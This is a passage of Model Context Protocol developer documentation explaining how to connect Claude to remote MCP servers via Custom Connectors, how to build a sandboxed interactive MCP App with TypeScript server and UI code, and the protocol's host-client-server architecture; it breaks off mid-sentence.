Many clients now support remote MCP servers, enabling a wide range of integration possibilities. This guide demonstrates how to connect to remote MCP servers using [Claude](https://claude.ai/) as an example, one of the [many clients that support MCP](/clients). While we focus on Claude's implementation through Custom Connectors, the concepts apply broadly to other MCP-compatible clients.
## Understanding Remote MCP Servers
Remote MCP servers function similarly to local MCP servers but are hosted on the internet rather than your local machine. They expose tools, prompts, and resources that Claude can use to perform tasks on your behalf. These servers can integrate with various services such as project management tools, documentation systems, code repositories, and any other API-enabled service.
The key advantage of remote MCP servers is their accessibility. Unlike local servers that require installation and configuration on each device, remote servers are available from any MCP client with an internet connection. This makes them ideal for web-based AI applications, integrations that emphasize ease of use, and services that require server-side processing or authentication.
## What are Custom Connectors?
Custom Connectors serve as the bridge between Claude and remote MCP servers. They allow you to connect Claude directly to the tools and data sources that matter most to your workflows, enabling Claude to operate within your favorite software and draw insights from the complete context of your external tools.
With Custom Connectors, you can:
* [Connect Claude to existing remote MCP servers](https://support.anthropic.com/en/articles/11175166-getting-started-with-custom-connectors-using-remote-mcp) provided by third-party developers
* [Build your own remote MCP servers to connect with any tool](https://support.anthropic.com/en/articles/11503834-building-custom-connectors-via-remote-mcp-servers)
## Connecting to a Remote MCP Server
The process of connecting Claude to a remote MCP server involves adding a Custom Connector through the [Claude interface](https://claude.ai/). This establishes a secure connection between Claude and your chosen remote server.
Open Claude in your browser and navigate to the settings page. You can access this by clicking on your profile icon and selecting "Settings" from the dropdown menu. Once in settings, locate and click on the "Connectors" section in the sidebar.
This will display your currently configured connectors and provide options to add new ones.
In the Connectors section, scroll to the bottom where you'll find the "Add custom connector" button. Click this button to begin the connection process.
A dialog will appear prompting you to enter the remote MCP server URL. This URL should be provided by the server developer or administrator. Enter the complete URL, ensuring it includes the proper protocol (`https://`) and any necessary path components.
After entering the URL, click "Add" to proceed with the connection.
Most remote MCP servers require authentication to ensure secure access to their resources. The authentication process varies depending on the server implementation but commonly involves OAuth, API keys, or username/password combinations.
Follow the authentication prompts provided by the server. This may redirect you to a third-party authentication provider or display a form within Claude. Once authentication is complete, Claude will establish a secure connection to the remote server.
After successful connection, the remote server's resources and prompts become available in your Claude conversations. You can access these by clicking the paperclip icon in the message input area, which opens the attachment menu.
The menu displays all available resources and prompts from your connected servers. Select the items you want to include in your conversation. These resources provide Claude with context and information from your external tools.
Remote MCP servers often expose multiple tools with varying capabilities. You can control which tools Claude is allowed to use by configuring permissions in the connector settings. This ensures Claude only performs actions you've explicitly authorized.
Navigate back to the Connectors settings and click on your connected server. Here you can enable or disable specific tools, set usage limits, and configure other security parameters according to your needs.
## Best Practices for Using Remote MCP Servers
When working with remote MCP servers, consider these recommendations to ensure a secure and efficient experience:
**Security considerations**: Always verify the authenticity of remote MCP servers before connecting. Only connect to servers from trusted sources, and review the permissions requested during authentication. Be cautious about granting access to sensitive data or systems.
**Managing multiple connectors**: You can connect to multiple remote MCP servers simultaneously. Organize your connectors by purpose or project to maintain clarity. Regularly review and remove connectors you no longer use to keep your workspace organized and secure.
## Next Steps
Now that you've connected Claude to a remote MCP server, you can explore its capabilities in your conversations. Try using the connected tools to automate tasks, access external data, or integrate with your existing workflows.
* Create custom remote MCP servers to integrate with proprietary tools and services
* Browse our collection of official and community-created MCP servers
* Learn how to connect Claude Desktop to local MCP servers for direct system access
* Dive deeper into how MCP works and its architecture
Remote MCP servers unlock powerful possibilities for extending Claude's capabilities. As you become familiar with these integrations, you'll discover new ways to streamline your workflows and accomplish complex tasks more efficiently.
# MCP Apps
Source: https://modelcontextprotocol.io/docs/extensions/apps
Build interactive UI applications that render inside MCP hosts like Claude Desktop
For comprehensive API documentation, advanced patterns, and the full specification, visit the [official MCP Apps documentation](https://modelcontextprotocol.github.io/ext-apps).
Text responses can only go so far. Sometimes users need to interact with data, not
just read about it. MCP Apps let servers return interactive HTML interfaces (data
visualizations, forms, dashboards) that render directly in the chat.
## Why not just build a web app?
You could build a standalone web app and send users a link. However, MCP Apps
offer these key advantages that a separate page can't match:
**Context preservation.** The app lives inside the conversation. Users don't
switch tabs, lose their place, or wonder which chat thread had that dashboard.
The UI is right there, alongside the discussion that led to it.
**Bidirectional data flow.** Your app can call any tool on the MCP server, and
the host can push fresh results to your app. A standalone web app would need its
own API, authentication, and state management. MCP Apps get this via existing
MCP patterns.
**Integration with the host's capabilities**. The app can delegate actions to the host, which can then invoke the capabilities and tools the user has already connected (subject to user consent). Instead of every app implementing and maintaining direct integrations (e.g., email providers), the app can request an outcome (like “schedule this meeting”), and the host routes it through the user’s existing connected capabilities.
**Security guarantees.** MCP Apps run in a sandboxed iframe controlled by the
host. They can't access the parent page, steal cookies, or escape their
container. This means hosts can safely render third-party apps without trusting
the server author completely.
If your use case doesn't benefit from these properties, a regular web app might
be simpler. But if you want tight integration with the LLM-based conversation,
MCP Apps are a much better tool.
## How MCP Apps work
Traditional MCP tools return text, images, resources or structured data that the host displays as
part of the conversation. MCP Apps extend this pattern by allowing tools to
declare a reference to an interactive UI in their tool description that the host
renders in place.
The core pattern combines two MCP primitives: a tool that declares a UI resource
in its description, plus a UI resource that renders data as an interactive HTML
interface.
When a large language model (LLM) decides to call a tool that supports MCP Apps,
here's what happens:
1. **UI preloading**: The tool description includes a `_meta.ui.resourceUri`
field pointing to a `ui://` resource. The host can preload this resource before
the tool is even called, enabling features like streaming tool inputs to the
app.
2. **Resource fetch**: The host fetches the UI resource from the server. This
resource contains an HTML page, often bundled with its JavaScript and CSS for
simplicity. Apps can also load external scripts and resources from origins
specified in `_meta.ui.csp`.
3. **Sandboxed rendering**: Web hosts typically render the HTML inside a
sandboxed [iframe](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe)
within the conversation. The sandbox restricts the app's access to the parent
page, ensuring security. The resource's `_meta.ui` object can include
`permissions` to request additional capabilities (e.g., microphone, camera)
and `csp` to control what external origins the app can load resources from.
4. **Bidirectional communication**: The app and host communicate through a
JSON-RPC protocol that forms its own dialect of MCP. Some requests and
notifications are shared with the core MCP protocol (e.g., `tools/call`), some
are similar (e.g., `ui/initialize`), and most are new with a `ui/` method name
prefix. The app can request tool calls, send messages, update the model's
context, and receive data from the host.
```mermaid theme={null}
sequenceDiagram
participant User
participant Agent
participant App as MCP App iframe
participant Server as MCP Server
User->>Agent: "show me analytics"
Note over User,App: Interactive app rendered in chat
Agent->>Server: tools/call
Server-->>Agent: tool input/result
Agent-->>App: tool result pushed to app
User->>App: user interacts
App->>Agent: tools/call request
Agent->>Server: tools/call (forwarded)
Server-->>Agent: fresh data
Agent-->>App: fresh data
Note over User,App: App updates with new data
App-->>Agent: context update
```
The app stays isolated from the host but can still call MCP tools through the
secure postMessage channel.
## When to use MCP Apps
MCP Apps are a good fit when your use case involves:
**Exploring complex data.** A user asks "show me sales by region." A text
response might list numbers, but an MCP App can render an interactive map where
users click regions to drill down, hover for details, and toggle between
metrics, all without additional prompts.
**Configuring with many options.** Setting up a deployment involves dozens of
interdependent choices. Rather than a back-and-forth conversation ("Which
region?" "What instance size?" "Enable autoscaling?"), an MCP App presents a
form where users see all options at once, with validation and defaults.
**Viewing rich media.** When a user asks to review a PDF, see a 3D model, or
preview generated images, text descriptions fall short. An MCP App embeds the
actual viewer (pan, zoom, rotate) directly in the conversation.
**Real-time monitoring.** A dashboard showing live metrics, logs, or system
status needs continuous updates. An MCP App maintains a persistent connection,
updating the display as data changes without requiring the user to ask "what's
the status now?"
**Multi-step workflows.** Approving expense reports, reviewing code changes, or
triaging issues involves examining items one by one. An MCP App provides
navigation controls, action buttons, and state that persists across
interactions.
## Getting started
You'll need [Node.js](https://nodejs.org/en/download) 18 or higher. Familiarity
with [MCP tools](/specification/2025-11-25/server/tools) and
[resources](/specification/2025-11-25/server/resources) is recommended since MCP
Apps combine both primitives. Experience with the
[MCP TypeScript SDK](https://github.com/modelcontextprotocol/typescript-sdk)
will help you better understand the server-side patterns.
The fastest way to create an MCP App is using an AI coding agent with the MCP
Apps skill. If you prefer to set up a project manually, skip to
[Manual setup](#manual-setup).
### Using an AI coding agent
AI coding agents with Skills support can scaffold a complete MCP App project for
you. Skills are folders of instructions and resources that your agent loads when
relevant. They teach the AI how to perform specialized tasks like creating MCP
Apps.
The `create-mcp-app` skill includes architecture guidance, best practices, and
working examples that the agent uses to generate your project.
If you are using Claude Code, you can install the skill directly with:
```
/plugin marketplace add modelcontextprotocol/ext-apps
/plugin install mcp-apps@modelcontextprotocol-ext-apps
```
You can also use the [Vercel Skills CLI](https://skills.sh/) to install skills across different AI coding agents:
```bash theme={null}
npx skills add modelcontextprotocol/ext-apps
```
Alternatively, you can install the skill manually by cloning the ext-apps repository:
```bash theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
```
And then copying the skill to the appropriate location for your agent:
| Agent | Skills directory (macOS/Linux) | Skills directory (Windows) |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------ | ------------------------------------- |
| [Claude Code](https://docs.anthropic.com/en/docs/claude-code/skills) | `~/.claude/skills/` | `%USERPROFILE%\.claude\skills\` |
| [VS Code](https://code.visualstudio.com/docs/copilot/customization/agent-skills) and [GitHub Copilot](https://docs.github.com/en/copilot/concepts/agents/about-agent-skills) | `~/.copilot/skills/` | `%USERPROFILE%\.copilot\skills\` |
| [Gemini CLI](https://geminicli.com/docs/cli/skills/) | `~/.gemini/skills/` | `%USERPROFILE%\.gemini\skills\` |
| [Cline](https://cline.bot/blog/cline-3-48-0-skills-and-websearch-make-cline-smarter) | `~/.cline/skills/` | `%USERPROFILE%\.cline\skills\` |
| [Goose](https://block.github.io/goose/docs/guides/context-engineering/using-skills/) | `~/.config/goose/skills/` | `%USERPROFILE%\.config\goose\skills\` |
| [Codex](https://developers.openai.com/codex/skills/) | `~/.codex/skills/` | `%USERPROFILE%\.codex\skills\` |
This list is not comprehensive. Other agents may support skills in different locations; check your agent's documentation.
For example, with Claude Code you can install the skill globally (available in all projects):
```bash macOS/Linux theme={null}
cp -r ext-apps/plugins/mcp-apps/skills/create-mcp-app ~/.claude/skills/create-mcp-app
```
```powershell Windows theme={null}
Copy-Item -Recurse ext-apps\plugins\mcp-apps\skills\create-mcp-app $env:USERPROFILE\.claude\skills\create-mcp-app
```
Or install it for a single project only by copying to `.claude/skills/` in your project directory:
```bash macOS/Linux theme={null}
mkdir -p .claude/skills && cp -r ext-apps/plugins/mcp-apps/skills/create-mcp-app .claude/skills/create-mcp-app
```
```powershell Windows theme={null}
New-Item -ItemType Directory -Force -Path .claude\skills | Out-Null; Copy-Item -Recurse ext-apps\plugins\mcp-apps\skills\create-mcp-app .claude\skills\create-mcp-app
```
To verify the skill is installed, ask your agent "What skills do you have access to?" — you should see `create-mcp-app` as one of the available skills.
Then ask your AI coding agent to build your app:
```
Create an MCP App that displays a color picker
```
The agent will recognize the `create-mcp-app` skill is relevant, load its instructions, then scaffold a complete project with server, UI, and configuration files. Once the agent finishes, install dependencies, build the UI, and start the server:
```bash macOS/Linux theme={null}
npm install && npm run build && npm run serve
```
```powershell Windows theme={null}
npm install; npm run build; npm run serve
```
Make sure you are in the generated **app folder** before running the commands above.
Follow the instructions in [Testing your app](#testing-your-app) below. For the color picker example, start a new chat and ask Claude to provide you a color picker.
### Manual setup
If you're not using an AI coding agent, or prefer to understand the setup
process, follow these steps.
A typical MCP App project separates the server code from the UI code. The server registers the tool and serves the UI resource, while the UI files get bundled into a single HTML file that the server returns when the host requests the resource. Install the dependencies:
```bash theme={null}
npm install @modelcontextprotocol/ext-apps @modelcontextprotocol/sdk
npm install -D typescript vite vite-plugin-singlefile express cors @types/express @types/cors tsx
```
The `ext-apps` package provides helpers for both the server side (registering tools and resources) and the client side (the `App` class for UI-to-host communication). Vite with the `vite-plugin-singlefile` plugin bundles your UI into a single HTML file that can be served as a resource.
The `"type": "module"` setting enables ES module syntax. The `build` script uses the `INPUT` environment variable to tell Vite which HTML file to bundle. The `serve` script runs your server using `tsx` for TypeScript execution.
```json theme={null}
{
"type": "module",
"scripts": {
"build": "INPUT=mcp-app.html vite build",
"serve": "npx tsx server.ts"
}
}
```
The TypeScript configuration targets modern JavaScript (`ES2022`) and uses ESNext modules with bundler resolution, which works well with Vite. The `include` array covers both the server code in the root and UI code in `src/`.
```json theme={null}
{
"compilerOptions": {
"target": "ES2022",
"module": "ESNext",
"moduleResolution": "bundler",
"strict": true,
"esModuleInterop": true,
"skipLibCheck": true,
"outDir": "dist"
},
"include": ["*.ts", "src/**/*.ts"]
}
```
```typescript theme={null}
import { defineConfig } from "vite";
import { viteSingleFile } from "vite-plugin-singlefile";
export default defineConfig({
plugins: [viteSingleFile()],
build: {
outDir: "dist",
rollupOptions: {
input: process.env.INPUT,
},
},
});
```
With the project structure and configuration in place, continue to [Building an MCP App](#building-an-mcp-app) below to implement the server and UI.
## Building an MCP App
Let's build a simple app that displays the current server time. This example
demonstrates the full pattern: registering a tool with UI metadata, serving the
bundled HTML as a resource, and building a UI that communicates with the server.
### Server implementation
The server needs to do two things: register a tool that includes the
`_meta.ui.resourceUri` field, and register a resource handler that serves the
bundled HTML. Here's the complete server file:
```typescript theme={null}
// server.ts
console.log("Starting MCP App server...");
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import {
registerAppTool,
registerAppResource,
RESOURCE_MIME_TYPE,
} from "@modelcontextprotocol/ext-apps/server";
import cors from "cors";
import express from "express";
import fs from "node:fs/promises";
import path from "node:path";
const server = new McpServer({
name: "My MCP App Server",
version: "1.0.0",
});
// The ui:// scheme tells hosts this is an MCP App resource.
// The path structure is arbitrary; organize it however makes sense for your app.
const resourceUri = "ui://get-time/mcp-app.html";
// Register the tool that returns the current time
registerAppTool(
server,
"get-time",
{
title: "Get Time",
description: "Returns the current server time.",
inputSchema: {},
_meta: { ui: { resourceUri } },
},
async () => {
const time = new Date().toISOString();
return {
content: [{ type: "text", text: time }],
};
},
);
// Register the resource that serves the bundled HTML
registerAppResource(
server,
resourceUri,
resourceUri,
{ mimeType: RESOURCE_MIME_TYPE },
async () => {
const html = await fs.readFile(
path.join(import.meta.dirname, "dist", "mcp-app.html"),
"utf-8",
);
return {
contents: [
{ uri: resourceUri, mimeType: RESOURCE_MIME_TYPE, text: html },
],
};
},
);
// Expose the MCP server over HTTP
const expressApp = express();
expressApp.use(cors());
expressApp.use(express.json());
expressApp.post("/mcp", async (req, res) => {
const transport = new StreamableHTTPServerTransport({
sessionIdGenerator: undefined,
enableJsonResponse: true,
});
res.on("close", () => transport.close());
await server.connect(transport);
await transport.handleRequest(req, res, req.body);
});
expressApp.listen(3001, (err) => {
if (err) {
console.error("Error starting server:", err);
process.exit(1);
}
console.log("Server listening on http://localhost:3001/mcp");
});
```
Let's break down the key parts:
* **`resourceUri`**: The `ui://` scheme tells hosts this is an MCP App resource.
The path structure is arbitrary.
* **`registerAppTool`**: Registers a tool with the `_meta.ui.resourceUri` field.
When the host calls this tool, the UI is fetched and rendered, and the tool result is passed to it upon arrival.
* **`registerAppResource`**: Serves the bundled HTML when the host requests the UI resource.
* **Express server**: Exposes the MCP server over HTTP on port 3001.
### UI implementation
The UI consists of an HTML page and a TypeScript module that uses the `App`
class to communicate with the host. Here's the HTML:
```html theme={null}
<!-- mcp-app.html: element IDs must match those used in src/mcp-app.ts -->
<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>Get Time App</title>
  </head>
  <body>
    <p>Server Time: <span id="server-time">Loading...</span></p>
    <button id="get-time-btn">Get Time</button>
    <script type="module" src="./src/mcp-app.ts"></script>
  </body>
</html>
```
And the TypeScript module:
```typescript theme={null}
// src/mcp-app.ts
import { App } from "@modelcontextprotocol/ext-apps";
const serverTimeEl = document.getElementById("server-time")!;
const getTimeBtn = document.getElementById("get-time-btn")!;
const app = new App({ name: "Get Time App", version: "1.0.0" });
// Establish communication with the host
app.connect();
// Handle the initial tool result pushed by the host
app.ontoolresult = (result) => {
const time = result.content?.find((c) => c.type === "text")?.text;
serverTimeEl.textContent = time ?? "[ERROR]";
};
// Proactively call tools when users interact with the UI
getTimeBtn.addEventListener("click", async () => {
const result = await app.callServerTool({
name: "get-time",
arguments: {},
});
const time = result.content?.find((c) => c.type === "text")?.text;
serverTimeEl.textContent = time ?? "[ERROR]";
});
```
The key parts:
* **`app.connect()`**: Establishes communication with the host. Call this once
when your app initializes.
* **`app.ontoolresult`**: A callback that fires when the host pushes a tool
result to your app (e.g., when the tool is first called and the UI renders).
* **`app.callServerTool()`**: Lets your app proactively call tools on the server.
Keep in mind that each call involves a round-trip to the server, so design your
UI to handle latency gracefully.
The `App` class provides additional methods for logging, opening URLs, and
updating the model's context with structured data from your app. See the full
[API documentation](https://modelcontextprotocol.github.io/ext-apps/api/).
## Testing your app
To test your MCP App, build the UI and start your local server:
```bash macOS/Linux theme={null}
npm run build && npm run serve
```
```powershell Windows theme={null}
npm run build; npm run serve
```
In the default configuration, your server will be available at
`http://localhost:3001/mcp`. However, to see your app render, you need an MCP
host that supports MCP Apps. There are two options.
### Testing with Claude
[Claude](https://claude.ai) (web) and [Claude Desktop](https://claude.ai/download)
support MCP Apps. For local development, you'll need to expose your server to
the internet. You can run an MCP server locally and use tools like `cloudflared`
to tunnel traffic through.
In a separate terminal, run:
```bash theme={null}
npx cloudflared tunnel --url http://localhost:3001
```
Copy the generated URL (e.g., `https://random-name.trycloudflare.com`) and add it
as a [custom connector](https://support.anthropic.com/en/articles/11175166-getting-started-with-custom-connectors-using-remote-mcp)
in Claude - click on your profile, go to **Settings**, **Connectors**, and
finally **Add custom connector**.
Custom connectors are available on paid Claude plans (Pro, Max, or Team).
### Testing with the basic-host
The `ext-apps` repository includes a test host for development. Clone the repo and
install dependencies:
```bash macOS/Linux theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
cd ext-apps/examples/basic-host
npm install
```
```powershell Windows theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps.git
cd ext-apps\examples\basic-host
npm install
```
Running `npm start` from `ext-apps/examples/basic-host/` will start the basic-host
test interface. To connect it to a specific server (e.g., one you're developing),
pass the `SERVERS` environment variable inline:
```bash macOS/Linux theme={null}
SERVERS='["http://localhost:3001/mcp"]' npm start
```
```powershell Windows theme={null}
$env:SERVERS='["http://localhost:3001/mcp"]'; npm start
```
Navigate to `http://localhost:8080`. You'll see a simple interface where you can
select a tool and call it. When you call your tool, the host fetches the UI
resource and renders it in a sandboxed iframe. You can then interact with your
app and verify that tool calls work correctly.
## Security model
MCP Apps run in a sandboxed
[iframe](https://developer.mozilla.org/docs/Web/HTML/Element/iframe), which
provides strong isolation from the host application. The sandbox prevents your
app from accessing the parent window's
[DOM](https://developer.mozilla.org/docs/Web/API/Document_Object_Model), reading
the host's cookies or local storage, navigating the parent page, or executing
scripts in the parent context.
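As a rough illustration of this isolation (not the actual App Bridge implementation), a host might embed an app's HTML along these lines; `appHtml` is assumed to hold the text fetched from the `ui://` resource:
```typescript theme={null}
// Minimal sketch of sandboxed embedding. Real hosts use the App Bridge
// module, which also handles message routing and policy enforcement.
declare const appHtml: string; // bundled HTML fetched from the ui:// resource

const iframe = document.createElement("iframe");
// allow-scripts without allow-same-origin gives the app an opaque origin:
// it can run code but cannot touch the parent DOM, cookies, or storage.
iframe.setAttribute("sandbox", "allow-scripts");
iframe.srcdoc = appHtml;
document.getElementById("chat-message")?.appendChild(iframe);
```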
All communication between your app and the host goes through the
[postMessage API](https://developer.mozilla.org/docs/Web/API/Window/postMessage),
which the `App` class shown above abstracts for you. The host controls which
capabilities your app can access. For example, a host might restrict which tools
an app can call or disable the `sendOpenLink` capability.
The sandbox is designed to prevent apps from escaping to access the host or user data.
## Framework support
MCP Apps use their own dialect of MCP, built on JSON-RPC like the core protocol.
Some messages are shared with regular MCP (e.g., `tools/call`), while others are
specific to apps (e.g., `ui/initialize`). The transport is
[postMessage](https://developer.mozilla.org/docs/Web/API/Window/postMessage)
instead of stdio or HTTP. Since it's all standard web primitives, you can use any
framework or none at all.
The `App` class from `@modelcontextprotocol/ext-apps` is a convenience wrapper,
not a requirement. You can implement the
[postMessage protocol](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx)
directly if you prefer to avoid dependencies or need tighter control.
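For instance, a dependency-free app could exchange messages with the host roughly like this. This is a sketch assuming standard JSON-RPC 2.0 framing as described above; the exact `ui/initialize` parameters are simplified, so check the specification before relying on them:
```typescript theme={null}
// Sketch: speaking the MCP Apps dialect over postMessage without the SDK.
let nextId = 1;

function sendRequest(method: string, params: unknown) {
  window.parent.postMessage(
    { jsonrpc: "2.0", id: nextId++, method, params },
    "*", // for illustration only; real apps should validate origins
  );
}

// Receive responses and host-initiated messages
window.addEventListener("message", (event) => {
  const msg = event.data;
  if (msg?.jsonrpc === "2.0") {
    console.log("Message from host:", msg);
  }
});

// Begin the handshake, then call a server tool through the host
sendRequest("ui/initialize", { appInfo: { name: "my-app", version: "1.0.0" } });
sendRequest("tools/call", { name: "get-time", arguments: {} });
```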
The [examples directory](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples)
includes starter templates for React, Vue, Svelte, Preact, Solid, and vanilla
JavaScript. These demonstrate recommended patterns for each framework, but
they're examples rather than requirements. Choose whatever works best for your
use case.
## Client support
MCP Apps is an extension to the [core MCP specification](/specification). Host support varies by client.
MCP Apps are currently supported by [Claude](https://claude.ai),
[Claude Desktop](https://claude.ai/download),
[Visual Studio Code (Insiders)](https://code.visualstudio.com/insiders), [Goose](https://block.github.io/goose/), [Postman](https://postman.com), and [MCPJam](https://www.mcpjam.com/). See the
[clients page](/clients) for the full list of MCP clients and their supported
features.
If you're building an MCP client and want to support MCP Apps, you have two options:
1. **Use a framework**: The [`@mcp-ui/client`](https://github.com/MCP-UI-Org/mcp-ui)
package provides React components for rendering and interacting with MCP Apps
views in your host application. See the
[MCP-UI documentation](https://mcpui.dev/) for usage details.
2. **Build on App Bridge**: The SDK includes an
[**App Bridge**](https://modelcontextprotocol.github.io/ext-apps/api/modules/app-bridge.html)
module that handles rendering apps in sandboxed iframes, message passing, tool
call proxying, and security policy enforcement. The
[basic-host example](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-host)
shows how to integrate it.
See the [API documentation](https://modelcontextprotocol.github.io/ext-apps/api/)
for implementation details.
## Examples
The [ext-apps repository](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples)
includes ready-to-run examples demonstrating different use cases:
* **3D and visualization**:
[map-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/map-server)
(CesiumJS globe),
[threejs-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/threejs-server)
(Three.js scenes),
[shadertoy-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/shadertoy-server)
(shader effects)
* **Data exploration**:
[cohort-heatmap-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/cohort-heatmap-server),
[customer-segmentation-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/customer-segmentation-server),
[wiki-explorer-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/wiki-explorer-server)
* **Business applications**:
[scenario-modeler-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/scenario-modeler-server),
[budget-allocator-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/budget-allocator-server)
* **Media**:
[pdf-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/pdf-server),
[video-resource-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/video-resource-server),
[sheet-music-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/sheet-music-server),
[say-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/say-server)
(text-to-speech)
* **Utilities**:
[qr-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/qr-server),
[system-monitor-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/system-monitor-server),
[transcript-server](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/transcript-server)
(speech-to-text)
* **Starter templates**:
[React](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-react),
[Vue](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-vue),
[Svelte](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-svelte),
[Preact](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-preact),
[Solid](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-solid),
[vanilla JavaScript](https://github.com/modelcontextprotocol/ext-apps/tree/main/examples/basic-server-vanillajs)
To run any example, replace `<example-name>` with the directory of the example you want:
```bash macOS/Linux theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps
cd ext-apps/examples/<example-name>
npm install && npm start
```
```powershell Windows theme={null}
git clone https://github.com/modelcontextprotocol/ext-apps
cd ext-apps\examples\<example-name>
npm install; npm start
```
## Learn more
* [API documentation](https://modelcontextprotocol.github.io/ext-apps/api/): Full SDK reference and API details
* [GitHub repository](https://github.com/modelcontextprotocol/ext-apps): Source code, examples, and issue tracker
* [Specification](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx): Technical specification for implementers
## Feedback
MCP Apps is under active development. If you encounter issues or have ideas for
improvements, open an issue on the
[GitHub repository](https://github.com/modelcontextprotocol/ext-apps/issues).
For broader discussions about the extension's direction, join the conversation
in [GitHub Discussions](https://github.com/modelcontextprotocol/ext-apps/discussions).
# What is the Model Context Protocol (MCP)?
Source: https://modelcontextprotocol.io/docs/getting-started/intro
MCP (Model Context Protocol) is an open-source standard for connecting AI applications to external systems.
Using MCP, AI applications like Claude or ChatGPT can connect to data sources (e.g. local files, databases), tools (e.g. search engines, calculators) and workflows (e.g. specialized prompts)—enabling them to access key information and perform tasks.
Think of MCP like a USB-C port for AI applications. Just as USB-C provides a standardized way to connect electronic devices, MCP provides a standardized way to connect AI applications to external systems.
## What can MCP enable?
* Agents can access your Google Calendar and Notion, acting as a more personalized AI assistant.
* Claude Code can generate an entire web app using a Figma design.
* Enterprise chatbots can connect to multiple databases across an organization, empowering users to analyze data using chat.
* AI models can create 3D designs on Blender and print them out using a 3D printer.
## Why does MCP matter?
Depending on where you sit in the ecosystem, MCP can have a range of benefits.
* **Developers**: MCP reduces development time and complexity when building, or integrating with, an AI application or agent.
* **AI applications or agents**: MCP provides access to an ecosystem of data sources, tools and apps which will enhance capabilities and improve the end-user experience.
* **End-users**: MCP results in more capable AI applications or agents which can access your data and take actions on your behalf when necessary.
## Start Building
* [Build an MCP server](/docs/develop/build-server): Create MCP servers to expose your data and tools
* [Build an MCP client](/docs/develop/build-client): Develop applications that connect to MCP servers
## Learn more
* [Architecture overview](/docs/learn/architecture): Learn the core concepts and architecture of MCP
# Architecture overview
Source: https://modelcontextprotocol.io/docs/learn/architecture
This overview of the Model Context Protocol (MCP) discusses its [scope](#scope) and [core concepts](#concepts-of-mcp), and provides an [example](#example) demonstrating each core concept.
Because MCP SDKs abstract away many concerns, most developers will likely find the [data layer protocol](#data-layer-protocol) section to be the most useful. It discusses how MCP servers can provide context to an AI application.
For specific implementation details, please refer to the documentation for your [language-specific SDK](/docs/sdk).
## Scope
The Model Context Protocol includes the following projects:
* [MCP Specification](https://modelcontextprotocol.io/specification/latest): A specification of MCP that outlines the implementation requirements for clients and servers.
* [MCP SDKs](/docs/sdk): SDKs for different programming languages that implement MCP.
* **MCP Development Tools**: Tools for developing MCP servers and clients, including the [MCP Inspector](https://github.com/modelcontextprotocol/inspector).
* [MCP Reference Server Implementations](https://github.com/modelcontextprotocol/servers): Reference implementations of MCP servers.
MCP focuses solely on the protocol for context exchange—it does not dictate
how AI applications use LLMs or manage the provided context.
## Concepts of MCP
### Participants
MCP follows a client-server architecture where an MCP host — an AI application like [Claude Code](https://www.anthropic.com/claude-code) or [Claude Desktop](https://www.claude.ai/download) — establishes connections to one or more MCP servers. The MCP host accomplishes this by creating one MCP client for each MCP server. Each MCP client maintains a dedicated connection with its corresponding MCP server.
Local MCP servers that use the STDIO transport typically serve a single MCP client, whereas remote MCP servers that use the Streamable HTTP transport will typically serve many MCP clients.
The key participants in the MCP architecture are:
* **MCP Host**: The AI application that coordinates and manages one or multiple MCP clients
* **MCP Client**: A component that maintains a connection to an MCP server and obtains context from an MCP server for the MCP host to use
* **MCP Server**: A program that provides context to MCP clients
**For example**: Visual Studio Code acts as an MCP host. When Visual Studio Code establishes a connection to an MCP server, such as the [Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/), the Visual Studio Code runtime instantiates an MCP client object that maintains the connection to the Sentry MCP server.
When Visual Studio Code subsequently connects to another MCP server, such as the [local filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem), the Visual Studio Code runtime instantiates an additional MCP client object to maintain this connection.
```mermaid theme={null}
graph TB
subgraph "MCP Host (AI Application)"
Client1["MCP Client 1"]
Client2["MCP Client 2"]
Client3["MCP Client 3"]
Client4["MCP Client 4"]
end
ServerA["MCP Server A - Local (e.g. Filesystem)"]
ServerB["MCP Server B - Local (e.g. Database)"]
ServerC["MCP Server C - Remote (e.g. Sentry)"]
Client1 ---|"Dedicated connection"| ServerA
Client2 ---|"Dedicated connection"| ServerB
Client3 ---|"Dedicated connection"| ServerC
Client4 ---|"Dedicated connection"| ServerC
```
Note that **MCP server** refers to the program that serves context data, regardless of
where it runs. MCP servers can execute locally or remotely. For example, when
Claude Desktop launches the [filesystem
server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem),
the server runs locally on the same machine because it uses the STDIO
transport. This is commonly referred to as a "local" MCP server. The official
[Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/) runs on the
